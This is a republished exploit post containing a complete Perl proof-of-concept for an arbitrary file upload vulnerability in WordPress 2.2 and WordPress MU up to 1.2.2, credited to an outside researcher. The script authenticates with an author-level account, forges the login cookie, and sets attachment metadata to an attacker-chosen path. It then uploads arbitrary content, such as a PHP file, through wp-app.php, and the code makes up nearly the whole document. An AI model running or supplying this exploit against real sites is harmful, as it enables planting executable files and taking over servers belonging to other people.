WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit
来源:http://www.buayacorp.com/ 作者:Alexander 发布时间:2007-06-27
#! /usr/bin/env perl
# Wordpress 2.2 and Wordpress MU <= 1.2.2 Arbitrary File Upload PoC # # Credits : Alexander Concha <alex at buayacorp dot com> # Website : http://www.buayacorp.com/ # Advisory: http://www.buayacorp.com/files/wordpress/wordpress-advisory.html
use Digest::MD5 qw(md5_hex); use LWP::UserAgent;
my $ua = new LWP::UserAgent; my $blog = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2]; my $remote_file = $ARGV[3]; my $local_file = $ARGV[4]; my $post_id = $ARGV[5];
if (@ARGV < 4) { print "\nUsage:\n"; print " wp-file-upload.pl <host> <username> <password> <remote_filename> [local_file] [post_id]\n\n"; print " <host> - full path to WordPress. http://victim.com/wordpress/\n"; print " <username> - valid username with any of these roles: author, editor, administrator\n"; print " <password> - valid password for the user\n"; print " <remote_file> - full path to the remote file. /home/vulnerable.com/wordpress/wp-content/uploads/foo.php\n"; print " [local_file] - file to upload\n"; print " [post_id] - every time this script is executed creates a new post, specify a post_ID if you already run it\n\n"; exit(); } $ua->requests_redirectable([]); $blog =~ s/\/*$/\//;
$url = 'wp-app.php'; if ( 200 != $ua->head($url . '?action=/service')->code ) { $url = 'app.php'; die "\nIt seems that this WP installation is not vulnerable: app.php and wp-app.php were not found.\n" unless 200 == $ua->head($url . '?action=/service')->code; }
$auth_cookie = get_auth_cookie();
sub LWP::UserAgent::simple_request { my($self, $request, $arg, $size) = @_; $request->header('Cookie' => $auth_cookie); $request->content_type('image/gif') if $request->method eq "PUT"; $request->uri($blog . $request->uri);
$self->_request_sanity_check($request); my $new_request = $self->prepare_request($request); $response = $self->send_request($new_request, $arg, $size);
print $request->method . " " . $request->uri . " " . $response->code . "\n";
return $response; }
sub get_contents { $file = shift; if ( -e $file ) { open FILE, $file or die("Invalid local file"); $file = join('', <FILE>); close FILE; } else { $file = <<PHP; <?php echo "Hello World!"; ?> PHP } return $file; } sub get_auth_cookie { $response = $ua->head('wp-login.php?logout'); if ( $response->headers->header('Set-Cookie') =~ m/wordpress(user|pass)(.*?)=/ ) { return "wordpressuser$2=$user;wordpresspass$2=".md5_hex(md5_hex($pass)); } return ''; } if (0 == $post_id) { $response = $ua->get('wp-admin/post-new.php'); die ("\nInvalid credentials or blog url.\n\n" . $response->as_string) unless 200 == $response->code;
if ( $response->content =~ m/name=._wpnonce. value=.([a-z\d]{10})./ ) { $response = $ua->post('wp-admin/post.php', [ '_wpnonce' => $1, 'action' => 'post', 'post_ID' => $post_id, 'post_type' => 'post', 'post_title' => 'foo', 'metakeyselect' => '#NONE#', 'metakeyinput' => '_wp_attached_file', 'metavalue' => $remote_file ], 'Cookie' => $auth_cookie);
# Checks for post-new.php?posted=post_ID if ( $response->headers->header('Location') =~ m/posted=(\d+)/ ) { $post_id = $1; } } } die "\nCould not get a valid post_id value.\n" unless 0 != $post_id;
$request = HTTP::Request->new(PUT => $url . '?action=/attachment/file/'.$post_id); $request->content(get_contents($local_file)); $response = $ua->request($request);
if ( 200 == $response->code ) { print "\nIt seems that the file has been posted successfully... :P\n"; print "Use the following value to update the remote file: post_id '$post_id'\n"; } else { print "\nError: there is no attachment metadata for post_id=$post_id\n\n" . $response->as_string() . "\n"; }
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